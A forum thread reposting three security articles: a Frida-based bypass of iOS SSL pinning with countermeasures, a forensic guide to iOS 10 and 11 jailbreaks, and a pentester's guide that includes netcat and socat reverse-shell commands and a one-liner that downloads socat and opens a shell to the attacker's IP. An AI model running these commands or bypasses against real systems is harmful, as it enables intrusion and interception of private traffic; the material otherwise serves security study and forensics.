  19. Prevent bypassing of SSL certificate pinning in iOS applications TECHNOLOGY iOS By: Dennis Frett - Software engineer One of the first things an attacker will do when reverse engineering a mobile application is to bypass the SSL/TLS (Secure Sockets Layer/Transport Layer Security) protection to gain a better insight in the application’s functioning and the way it communicates with its server. In this blog, we explain which techniques are used to bypass SSL pinning in iOS and which countermeasures can be taken. What is SSL pinning? When mobile apps communicate with a server, they typically use SSL to protect the transmitted data against eavesdropping and tampering. By default, SSL implementations used in apps trust any server with certificate trusted by the operating system’s trust store. This store is a list of certificate authorities that is shipped with the operating system. With SSL pinning, however, the application is configured to reject all but one or a few predefined certificates. Whenever the application connects to a server, it compares the server certificate with the pinned certificate(s). If and only if they match, the server is trusted and the SSL connection is established. Why do we need SSL pinning? Setting up and maintaining SSL sessions is usually delegated to a system library. This means that the application that tries to establish a connection does not determine which certificates to trust and which not. The application relies entirely on the certificates that are included in the operating system’s trust store. A researcher who generates a self-signed certificate and includes it in the operating system's trust store can set up a man-in-the-middle attack against any app that uses SSL. This would allow him to read and manipulate every single SSL session. The attacker could use this ability to reverse engineer the protocol the app uses or to extract API keys from the requests. Attackers can also compromise SSL sessions by tricking the user into installing a trusted CA through a malicious web page. Or the root CAs trusted by the device can get compromised and be used to generate certificates. Narrowing the set of trusted certificates through the implementation of SSL pinning effectively protects applications from the described remote attacks. It also prevents reverse engineers from adding a custom root CA to the store of their own device to analyze the functionality of the application and the way it communicates with the server. SSL pinning implementation in iOS SSL pinning is implemented by storing additional information inside the app to identify the server and ensure that no man-in-the-middle attack is being carried out. What to pin? Either the actual server certificate itself or the public key of the server is pinned. You can opt to store the exact data or a hash of that data. This can be a file hash of the certificate file or a hash of the public key string. The choice between pinning the certificate or the public key has a few implications for security and maintenance of the application. This lies outside the scope of this blog, but more information can be found here. Embedding pinned data The data required for SSL pinning can be embedded in the application in two ways: in an asset file or as a string in the actual code of the app. If you pin the certificate file, the certificate is usually embedded as an asset file. Each time an SSL connection is made, the received server certificate is compared to the known certificate(s) file(s). Only if the files match exactly, the connection is trusted. When pinning the public key of the server, the key can be embedded as a string in the application code or it can be stored in an asset file. Whenever an SSL connection is made, the public key is extracted from the received server certificate and compared to the stored string. If the strings match exactly, the connection is trusted. Popular Options The following libraries are popular options for implementing SSL pinning in Swift and Objective-C iOS applications. Name Pinning implementation Language Type Link NSURLSession Certificate file, public key Objective-C Apple networking library Link AlamoFire Certificate file, public key Swift Networking library Link AFNetworking Certificate file, public key Objective-C Networking library Link TrustKit Public key Objective-C SSL pinning Link NSURLSession is Apple’s API for facilitating network communication. It is a low-level framework, so implementing SSL pinning with it is hard and requires a lot of manual checks. TrustKit, AlamoFire and AFNetworking are widely used frameworks built on top of NSURLSession. Both AFNetworking and AlamoFire are full-fledged networking libraries that support SSL pinning checks as part of their API. TrustKit is a small framework that only implements SSL pinning checks. AFNetworking for Objective-C apps or AlamoFire for Swift apps are good choices when you are looking for a complete network library. If you only need SSL pinning, TrustKit is a good option. Bypass SSL pinning protection Bypassing SSL pinning can be achieved in one of two ways: By avoiding the SSL pinning check or discarding the result of the check. By replacing the pinned data in the application, for example the certificate asset or the hashed key. In the next sections, we will demonstrate both methods using a sample application and provide some suggestions on how to prevent tampering attempts. Test setup and goal We will show how to bypass TrustKit SSL pinning in the TrustKit demo application running on a jailbroken iPhone. We will be using the following tools. mitmproxy is used to analyze what data is being sent over the network. Alternative tools would be Burp Suite or Charles. Frida is used for hooking and patching methods. Other popular hooking frameworks are Cydia Substrate, Cycript or Substitute. To replace strings in the binary, we will use the Hopper disassembler. The TrustKit demo application has minimal functionality. It only tries to connect to https://www.yahoo.com/using an invalid pinned hash for that domain. let trustKitConfig: [String: Any] = [ kTSKSwizzleNetworkDelegates: false, kTSKPinnedDomains: [ "yahoo.com": [ kTSKEnforcePinning: true, kTSKIncludeSubdomains: true, kTSKPublicKeyAlgorithms: [kTSKAlgorithmRsa2048], // Invalid pins to demonstrate a pinning failure kTSKPublicKeyHashes: [ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=", "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=" ], kTSKReportUris:["https://overmind.datatheorem.com/trustkit/report"], ], … Note that even if the supplied hashes would be valid for the yahoo.com domain, SSL pinning validation should still fail as long as we’re using a man-in-the-middle proxy. When connecting to yahoo.com, mitmproxy shows us that the domain is not actually visited. Only the report of the SSL pinning verification is sent to the configured servers. The device itself displays a message that the pinning validation failed. All of this is expected behavior since SSL pinning is enabled. Avoiding the SSL pinning check We will explain how to bypass the SSL pinning check with Frida. Before we can try to bypass it, we need to find out where in the code the actual SSL pinning check is performed. Finding the check Since TrustKit is open source, we can easily find out where the actual certificate validation logic takes place: -[TSKPinningValidator evaluateTrust:forHostname:]. In cases in which the source code is not available, a good look at the API of the SSL pinning library will usually reveal where the actual validation work is done. The signature of evaluateTrust:forHostname: contains a lot of information about the method. - (TSKTrustDecision)evaluateTrust:(SecTrustRef _Nonnull)serverTrust forHostname:(NSString * _Nonnull)serverHostname The method is passed 2 arguments, including the hostname of the server that is being contacted, and it returns a TSKTrustDecision. The TSKTrustDecision type is a simple enum. /** Possible return values when verifying a server's identity against a set of pins. */ typedef NS_ENUM(NSInteger, TSKTrustEvaluationResult) { TSKTrustEvaluationSuccess, TSKTrustEvaluationFailedNoMatchingPin, TSKTrustEvaluationFailedInvalidCertificateChain, TSKTrustEvaluationErrorInvalidParameters, TSKTrustEvaluationFailedUserDefinedTrustAnchor, TSKTrustEvaluationErrorCouldNotGenerateSpkiHash, }; The source code documents each of these fields, but it is clear that the most interesting value is TSKTrustEvaluationSuccess. Bypassing the check To bypass the TrustKit SSL pinning check, we will hook the -[TSKPinningValidator evaluateTrust:forHostname:] method using Frida and ensure it always returns the required value. First, we create a Frida instrumentation script and save it as disable_trustkit.js. var evalTrust = ObjC.classes.TSKPinningValidator["- evaluateTrust:forHostname:"]; Interceptor.attach(evalTrust.implementation, { onLeave: function(retval) { console.log("Current return value: " + retval); retval.replace(0); console.log("Return value replaced with (TSKTrustDecision) \ TSKTrustDecisionShouldAllowConnection"); } }); This script will attach Frida to the evaluateTrust:forHostname: instance method in the TSKPinningValidator interface and execute the given code each time this method returns. The code replaces the return value with 0 (TSKTrustEvaluationSuccess) regardless of its previous value and logs this. We launch Frida and attach to the TrustKitDemo process on our device, executing our script: frida -U -l disable_trustkit.js -n TrustKitDemo-Swift. If we try to load https://www.yahoo.com now, we see in mitmproxy suite that the URL was loaded successfully. The device also shows that the pin validation succeeded. Locally, Frida returns the following output showing that the hook did what we expected. [iPhone::TrustKitDemo-Swift]-> Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection We have now successfully bypassed TrustKit SSL pinning and are able to view and modify all web requests. Of course, this is only a very basic example of bypassing a single SSL pinning implementation through changing a return value. Off-the-shelf tools Bypassing SSL can be accomplished even easier using existing tweaks for jailbroken devices. SSL Kill Switch 2, for example, patches the low-level iOS TLS stack, disabling all SSL pinning implementations that use it. The Objection SSL Pinning disabler for Frida implements the low-level checks of SSL Kill Switch 2 and extends these with a few framework-specific hooks. The following table outlines the methods that can be hooked for some SSL pinning frameworks. libcoretls_cfhelpers.dylib tls_helper_create_peer_trust NSURLSession -[* URLSession:didReceiveChallenge:completionHandler:] NSURLConnection -[* connection:willSendRequestForAuthenticationChallenge:] AFNetworking -[AFSecurityPolicy setSSLPinningMode:] -[AFSecurityPolicy setAllowInvalidCertificates:] +[AFSecurityPolicy policyWithPinningMode:] +[AFSecurityPolicy policyWithPinningMode:withPinnedCertificates:] Mitigation: detect hooking Before verifying the SSL pin, we can verify the integrity of the above functions. As an example, we’ll use SSL Kill Switch 2 which is built on top of the ‘Cydia Substrate’ framework, a commonly used library for writing runtime hooks. Hooking in this framework is done through the MSHookFunction API. The method explained here is a proof-of-concept. Don’t use this hook detection code in production software. It is a very basic and only detects a specific kind of hook on ARM64. Using this check without any additional obfuscation would also make it very easy to remove. A common way of hooking native functions is to overwrite their first couple of instructions with a ‘trampoline’, a set of instructions responsible for diverting control flow to a new code fragment to replace or augment the original behavior. Using lldb, we can see exactly what this ‘trampoline’ looks like. First 10 instructions of the unhooked function: (llb) dis -n tls_helper_create_peer_trust libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust: 0x1a8c13514 <+0>: stp x26, x25, [sp, #-0x50]! 0x1a8c13518 <+4>: stp x24, x23, [sp, #0x10] 0x1a8c1351c <+8>: stp x22, x21, [sp, #0x20] 0x1a8c13520 <+12>: stp x20, x19, [sp, #0x30] 0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40] 0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40 0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20 0x1a8c13530 <+28>: mov x19, x2 0x1a8c13534 <+32>: mov x24, x1 0x1a8c13538 <+36>: mov x21, x0 First 10 instructions of the hooked function: (llb) dis -n tls_helper_create_peer_trust libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust: 0x1a8c13514 <+0>: ldr x16, #0x8 ; <+8> 0x1a8c13518 <+4>: br x16 0x1a8c1351c <+8>: .long 0x00267c2c ; unknown opcode 0x1a8c13520 <+12>: .long 0x00000001 ; unknown opcode 0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40] 0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40 0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20 0x1a8c13530 <+28>: mov x19, x2 0x1a8c13534 <+32>: mov x24, x1 0x1a8c13538 <+36>: mov x21, x0 In the hooked function, the first 16 bytes form the trampoline. The address 0x00000001002ebc2c is loaded into register x16 after which it jumps to that address (BR X16). This address refers to SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust, which is SSL Kill Switch 2’s replaced implementation (lldb) dis -a 0x00000001002ebc2c SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust: 0x1002ebc2c <+0>: sub sp, sp, #0x20 ; =0x20 0x1002ebc30 <+4>: mov w8, #0x0 0x1002ebc34 <+8>: str x0, [sp, #0x18] 0x1002ebc38 <+12>: strb w1, [sp, #0x17] 0x1002ebc3c <+16>: str x2, [sp, #0x8] 0x1002ebc40 <+20>: mov x0, x8 0x1002ebc44 <+24>: add sp, sp, #0x20 ; =0x20 If a function’s implementation is known in advance, the first few bytes of the found function can be compared to the known bytes, effectively ‘pinning’ the function implementation. For Cydia Substrate, we see the function being patched with an unconditional branch to a register (BR Xn), so we can check if we find such an instruction in the first few bytes. If a branch instruction is found, we assume the function is hooked, otherwise we assume it is valid. For demonstration purposes, this simplified assumption will suffice. To find a good mask to detect branch instructions, we had a look at the opcode tables in the GNU Binutils source code. The aarch64_opcode_table table contains ARM64 opcodes and a mask for the opcode. struct aarch64_opcode aarch64_opcode_table[] = { ... /* Unconditional branch (register). */ {"br", 0xd61f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0}, {"blr", 0xd63f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0}, {"ret", 0xd65f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, F_OPD0_OPT | F_DEFAULT (30)}, ... The entries are aarch64_opcode structs. From the opcode mask (0xfffffc1f) and the instruction representations, we can deduce that the opcode for unconditional branch to register value instructions must match 0xD61F0000. // Only valid for ARM64. int isSSLHooked() { void* (*createTrustFunc)() = dlsym(RTLD_DEFAULT, "tls_helper_create_peer_trust"); if(createTrustFunc == 0x0){ // Unable to find symbol, assume function is hooked. return 1; } unsigned int * createTrustFuncAddr = (unsigned int *) createTrustFunc; // Verify if one of first three instructions is an unconditional branch // to register (BR Xn), unconditional branch with link to register // (BLR Xn), return (RET). for(int i = 0; i < 3; i++){ int opCode = createTrustFuncAddr[i] & 0xfffffc1f; if(opCode == 0xD61F0000){ // Instruction found, function is hooked. return 1; } } // Function is not hooked through a trampoline. return 0; } We can call this function before an SSL pinning check is done, for example in loadUrl, and only start an SSL session if the checked function is not hooked. Mitigation: name obfucation To bypass SSL pinning, the attacker first needs to find out which method he has to hook . By using a tool to obfuscate Swift and Objective-C metadata in their iOS app, developers can make it much more difficult for the attacker to determine which methods to hook. Name obfuscation will also throw off all automated tools that look for a known method name. An obfuscator can rename methods in a different way in each single build of the application, forcing an attacker to search the actual name in each new version. It is important to note that name obfuscation only protects against tools that bypass SSL checks implemented in the code of applications or in libraries included in the application. Tools that work by hooking system frameworks won’t be deterred by it. Replacing SSL pinning data The other way to bypass SSL pinning is to replace the pinned data inside the application. If we are able to replace the original pinned certificate file or public key string with one that belongs to our man-in-the-middle server, we would be pinning our own server. Replacing an embedded certificate file can be as easy as swapping a file in the IPA package. In implementations that pin a hash of the server public key, we can replace the string with the hash of our own public key. The screenshot below shows the TrustKit demo application loaded into Hopper. Hopper allows us to replace strings in the MachO file and reassemble it into a valid executable. Once the file or the string is replaced, the directory needs to be resigned and zipped as an IPA. This lies outside the scope of this blog, but more information can be found here. Mitigation: string encryption When pinning certificates with a list of hard-coded public key hashes, it is a good idea to encrypt the values. This doesn’t protect against hooking, but makes it much more difficult to replace the original hashes with those of an attacker certificate since these would have to be correctly encrypted as well. Mitigation: control flow obfuscation A reverse engineer can analyze the control flow of the application to find the location where the actual hash is verified. If he succeeds in finding it, he can see which strings are used and find out the location of the hash string in the binary. By obfuscating the control flow of the application, the app developer makes it much more difficult to perform a manual analysis of the code. Sursa: https://www.guardsquare.com/en/blog/iOS-SSL-certificate-pinning-bypassing
  20. Jailbreaking iOS 11 And All Versions Of iOS 10 POSTED BY SCAR ⋅ MARCH 30, 2018 ⋅ LEAVE A COMMENT FILED UNDER COMPUTER FORENSICS, DFIR, DIGITAL FORENSICS, IOS FORENSICS, JAILBREAKING by Oleg Afonin, Mobile Product Specialist at ElcomSoft Jailbreaking iOS is becoming increasingly difficult, especially considering the amounts of money Apple and independent bug hunters are paying for discovered vulnerabilities that could lead to a working exploit. Late last year, a bug hunter at Google’s Project Zero discovered one such vulnerability and developed and published an exploit that gave birth to a plethora of jailbreak tools for all versions of iOS 10 as well as iOS 11.0 through 11.1.2. The newly emerged jailbreaks are all exploiting the same vulnerability. Moreover, they are all using the same off-the-shelf exploit to jailbreak the device. However, there are major differences between the newly emerged jailbreaks that are worth explaining. Why Jailbreak? Mobile forensic experts use jailbreaks for a different reason compared to enthusiast users. Jailbreaking, or obtaining root-level access to the file system, is a required pre-requisite for most physical acquisition tasks as it exposes the file system to forensic acquisition tools, helping circumvent iOS sandbox protection and access protected app data. Jailbreaking the device helps experts extract the largest amount of data from the device. During jailbreaking, many software restrictions imposed by iOS are removed through the use of software exploits. Jailbreaking in general performs multiple tasks such as escaping the sandbox, bypassing kernel patch protection. For the mobile forensic expert, jailbreaking permits root access to the file system and allows establishing SSH connectivity to the device. This, in turn, allows accessing and extracting data that would be otherwise guarded by the operating system. In this article, we’ll review the five latest jailbreaks for iOS 10.0 through 10.3.3 and 11.0 through 11.1.2. iOS 10.0-10.3.3 (32-bit): h3lix iOS 10.0-10.3.3 (64-bit): doubleH3lix, Meridian iOS 10.3.x (64-bit, A7-A9 only): g0blin iOS 11.0-11.1.2: LiberIOS iOS 11.0-11.1.2: Electra Before we review the individual jailbreak tools, let us first see what they have in common. What Is a Jailbreak? Jailbreaking modern versions of iOS is an extremely complex process exploiting multiple vulnerabilities in various parts of the OS to defeat the systems’ security measures. In general terms, a jailbreak performs the following steps: Sandbox Escape: during this stem, the jailbreak tool utilizes an exploit allowing it to access components it does not have the permissions to. Privilege Escalation: the jailbreak gains elevated privileges allowing it to access protected resources (e.g. mount the root file system, patch the kernel, inject code etc.) KPP Bypass: disables or works around the code signing check, which allows modifications to the file system without making the device unbootable, causing a bootloop or random reboots. While getting more complicated, modern jailbreak tools are safer to use. Starting with iOS 11, all jailbreaks are utilizing the same installation procedure. A failed jailbreak does not cause system instability, and does not required reinstalling iOS in order to perform another attempt. General Implications of Jailbreaking The main purpose of a jailbreak is circumventing iOS security measures. A jailbroken device becomes vulnerable to attacks and malicious code unimaginable on a non-jailbroken device. Since a jailbreak allows installed unsigned code, an jailbroken iOS device starts behaving much like Android devices with the “Allow installation from unknown sources” option turned on. In addition, sideloaded apps on jailbroken devices may obtain full access to other apps’ sandboxed space, thus accessing personal (and highly secure) information they were never meant to. Forensic Implications of iOS 10 and 11 Jailbreaks Jailbreak tools are exploiting vulnerabilities. They can be picky, only supporting certain combinations of software (version of iOS) and hardware, allowing or disallowing third-party software repositories (Cydia) and potentially having other limitations. Installing a jailbreak brings the following forensic consequences. System and data partitions modified. A jailbreak unavoidably modifies both the system and user data partitions. This must be documented in order to maintain evidence admissibility. The jailbreak installation procedure (starting with iOS 10) requires a working Internet connection (to at least ppq.apple.com) from both the computer and the iOS device being jailbroken. If the iOS device has an outstanding remote wipe or iCloud lock request, it might be locked the instant the connection is established. Contacting Apple to ensure there are no such requests (as well as blocking subsequent requests) is a good idea. Jailbreaking an iOS device modifies both user data and system partitions. These modifications must be properly documented to maintain admissibility of collected evidence. At this time, it is not possible to perform a clean removal of the jailbreak. Modifications performed to the system partition are persistent; even a factory reset would not remove the jailbreak. While some jailbreak tools (e.g. Electra) claim to create an APFS snapshot to allow restoring the system to pre-jailbreak condition in the future, there are currently no tools available to perform such restore. Experts must carefully consider the above implications before attempting to jailbreak a device. Installing a Jailbreak All jailbreaks for iOS 10 and iOS 11 share a common installation procedure. Steps to jailbreak: Back up data with iTunes or Elcomsoft iOS Forensic Toolkit (if backup password is empty, specify and record a temporary password). Obtain and install the jailbreak tool using the appropriate links. This includes two files: The jailbreak IPA file Cydia Impactor available at http://www.cydiaimpactor.com/ Cydia Impactor (developed by Saurik) is used to sign the IPA file so that the jailbreak tool can be executed on iOS devices. You will need to use valid Apple ID credentials for signing the IPA. We recommend using a newly created Apple ID for signing the certificate. Connect the iOS device to the computer, trust the computer on the iOS device and launch Cydia Impactor. Drag the jailbreak IPA onto Cydia Impactor app. Provide Apple ID and password when prompted. Click OK to allow Cydia Impactor to sign the IPA and upload it onto the iOS device. (A disposable Apple account is recommended; there is no need to use the same Apple ID as the main ID on the device). Cydia Impactor will sideload the IPA file onto the iOS device. If you attempt to launch the jailbreak IPA at this time, the attempt fill fail as the digital certificate for that app is not yet trusted. You will need to trust the certificate in order to be able to launch the jailbreak. To do that, on the iOS device, open Settings > General > Device Management. You will see a developer profile under the “Apple ID” heading. Tap the profile to establish trust for this developer. (An Internet connection is required to verify the app developer’s certificate when establishing trust.) On the iOS device, find the jailbreak app and run it. Follow the on-screen instructions. After you jailbreak, the device will respring. Note that neither jailbreak will install the Cydia app; however, the jailbreak may already include a working SSH daemon (make sure to specify the correct port number in iOS Forensic Toolkit, which can be 22 or 2222). If it does not, you’ll have to install OpenSSH from Cydia. If the built-in SSH daemon does not work on either port number, download and install OpenSSH from Cydia. A working SSH connection is required to perform physical acquisition. iOS 11 Jailbreaks There are two jailbreaks supporting physical acquisition with iOS Forensic Toolkit that are compatible with iOS 11.0 through 11.1.2. The LiberIOS and Electra jailbreaks are based on the exploit discovered by Google Project Zero. Both jailbreaks are compatible with iOS Forensic Toolkit. If one of the two jailbreaks does not work for a particular combination of hardware and iOS version, you may try rebooting the device and applying a different jailbreak. LiberIOS: http://newosxbook.com/liberios/ Electra: https://coolstar.org/electra/ At this time, only the Electra jailbreak supports Cydia. LiberIOS does not support Cydia. The latest build of Electra does support Cydia, with Dropbear SSH daemon running on port 22. Both jailbreaks employ a so-called ‘KPP-less’ approach to jailbreaking. In this approach, the jailbreak does not patch or otherwise alter the state of Apple’s Kernel Patch Protection (KPP) service that checks file system integrity during boot and then periodically while the system is running. All previous jailbreaks used to patch KPP (a so-called ‘KPP bypass’ approach). More information about KPP and how it was patched in earlier jailbreaks is available in How Kernel Patch Protection Works and How Hackers Bypass KPP. LiberIOS and Electra employ a different approach, leaving KPP alone and writing into different areas of the file system instead. While this approach leads to a potentially more stable jailbreak, it also limits the ability to run Cydia Substrate, requiring its complete rework. At this time, only the Electra jailbreak managed to include a working copy of Cydia in iOS 11. In addition, the Electra jailbreak will create a APFS snapshot immediately after jailbreaking. The APFS snapshot can be best described as a file system-level restore point allowing you to roll back the root file system to exactly the state it was immediately after jailbreaking. By performing a factory reset afterwards, you will get a clean system without any traces of jailbreaking. Do note, however, that using the APFS snapshot to roll back the device requires a not yet released tool called SemiRestore11. According to Electra jailbreak developer, this is how it works: Prior to jailbreaking, Electra RC 3.x/final release will check if your device is in a somewhat clean state If it is not in a somewhat clean state, it’ll give you a warning message and ask if you want to continue jailbreaking anyways However, if it is in a clean state, it will take an APFS snapshot of the root filesystem (/) Later on, if you would like to utilize SemiRestore, it will tell APFS to revert to the snapshot that Electra created when the device was first jailbroken After the APFS snapshot of the rootfs is reverted, you can “Reset all Contents and Settings” (which will wipe /var) and you will have a stock iPhone on iOS 11.0 – 11.1.2! Both LiberIOS and Electra jailbreaks are semi-tethered. If you reboot the device, you will have to re-run the jailbreak app to activate the jailbreak. The jailbreak will expire after 7 days, after which you will have to re-run the entire procedure starting with using Cydia Impactor on your computer. iOS 10 Jailbreaks There are several iOS 10 jailbreaks based on the same vulnerability as the jailbreaks for iOS 11. The h3lix (https://h3lix.tihmstar.net/) jailbreak supports all 32-bit devices that are running any iOS version between 10.0 and 10.3.3. h3lix is the only 32-bit jailbreak covering all versions of iOS 10 that is supported by iOS Forensic Toolkit. The same developer released a version of the h3lix jailbreak for 64-bit devices running all versiosn of iOS 10.0 through 10.3.3. The doubleH3lix (https://doubleh3lix.tihmstar.net/) jailbreak includes Cydia repository, but comes without a built-in SSH client. Installing OpenSSH from the Cydia store is obligatory to perform physical acquisition. In our tests, we discovered that OpenSSH may not work immediately after the installation, requiring a phone reboot. After rebooting the phone, one must wait for 3 to 5 minutes before re-applying the jailbreak; otherwise, the jailbreak may fail with “Kernel exploit failed” error followed by another reboot. The Meridian (https://meridian.sparkes.zone/) jailbreak supports all 64-bit devices that are running any iOS version between 10.0 and 10.3.3. Notably, the iPhone 8, 8 Plus and iPhone X are missing from the list of supported devices as they were released with iOS 11 out of the box. Meridian is a KPP-less jailbreak. KPP-less is a new style of jailbreaking which avoids writing to certain protected areas of the kernel; this may cause issues with Cydia Substrate. g0blin (https://g0blin.sticktron.net/) is a specific jailbreak that targets a limited set of iOS versions running on certain hardware. Specifically, the g0blin jailbreak targets iOS 10.3 through 10.3.3 running on devices equipped by A7 through A9 chip sets. This includes the iPad 5, iPad Air and Air 2, iPad Pro (2015), iPad mini 2 through 4, iPod Touch 6, as well as iPhone 5s, 6/Plus, SE and 6s/Plus. The reason for choosing this specific jailbreak would be compatibility. The g0blin jailbreak supports Cydia; the RC1 version of this tool includes dropbear SSH (the RC2 drops dropbear support, making you install OpenSSH instead from the pre-installed Cydia app). For this reason, consider using either g0blin_rc2.ipa or the older g0blin_rc1.ipadepending on your requirements. The RC2 supports a larger (yet unspecified) set of iOS/hardware combinations, while the RC1 includes dropbear SSH without the need to launch Cydia to manually install OpenSSH. What Next? Installing a jailbreak is a required pre-requisite for physical extraction. The process of physical extraction is described in Breaking into iOS 11. An alternative to physical extraction is logical acquisition, which can be performed even on a locked device if a lockdown file (iTunes pairing record) is available. However, using existing pairing records becomes more complicated as iOS 11.3 limits the lifespan of lockdown records. Conclusion We described the differences between jailbreaks utilizing the newly discovered vulnerability published by Google Project Zero, and covered the steps to install and (for iOS 11 Electra jailbreak) uninstall the jailbreaks. Founded in 1990, ElcomSoft Co. Ltd. is a leading developer of digital forensics tools. The company offers state-of-the-art solutions for businesses, forensic and law enforcement specialists, provides training and consulting services on mobile and computer forensics. Sursa: https://articles.forensicfocus.com/2018/03/30/jailbreaking-ios-11-and-all-versions-of-ios-10/
  21. Upgrading simple shells to fully interactive TTYs 10 JULY 2017 EMAIL TWITTER REDDIT Table of Contents Generating reverse shell commands Method 1: Python pty module Method 2: Using socat Method 3: Upgrading from netcat with magic tl;dr cheatsheet Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit "Ctrl-C" thinking it will stop it but it instead kills the entire connection. Besides not correctly handling SIGINT, these"dumb" shells have other shortcomings as well: Some commands, like su and ssh require a proper terminal to run STDERR usually isn't displayed Can't properly use text editors like vim No tab-complete No up arrow history No job control Etc... Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities: Pentest Monkey - Post Exploitation Without a TTY Phineas Fisher Hacks Catalan Police Union Website Phineas Fisher - Hackingteam Writeup For reference, in all the screenshots and commands to follow, I am injecting commands in to a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"): VICTIM IP: 10.0.3.7 KALI IP: 10.0.3.4 Generating reverse shell commands Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell: nc -e /bin/sh 10.0.3.4 4444 and catching it with: nc -lvp 4444 The problem is not every server has netcat installed, and not every version of netcat has the -e option. Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells: Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag: And here's a Perl oneliner in case netcat isn't installed: These can all be caught by using netcat and listening on the port specified (4444). Method 1: Python pty module One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let's you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command: python -c 'import pty; pty.spawn("/bin/bash")' This will let you run su for example (in addition to giving you a nicer prompt) Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close Netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times. Method 2: Using socat socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions. The following commands will yield a fully interactive TTY reverse shell: On Kali (listen): socat file:`tty`,raw,echo=0 tcp-listen:4444 On Victim (launch): socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It's a full terminal. Pretty sweet. Method 3: Upgrading from netcat with magic I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal. First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z While the shell is in the background, now examine the current terminal and STTY info so we can force the connected shell to match it: The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116") With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: stty raw -echo With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed. Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset. Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground. The reset command was then entered into the netcat shell After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc) all over a netcat connection: The possibilities are endless now. Tmux over a netcat shell?? Why not? tl;dr cheatsheet Cheatsheet commands: Using Python for a psuedo terminal python -c 'import pty; pty.spawn("/bin/bash")' Using socat #Listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 Using stty options # In reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ stty raw -echo $ fg # In reverse shell $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols> Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy! -ropnop Sursa: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
      • 1
      • Thanks
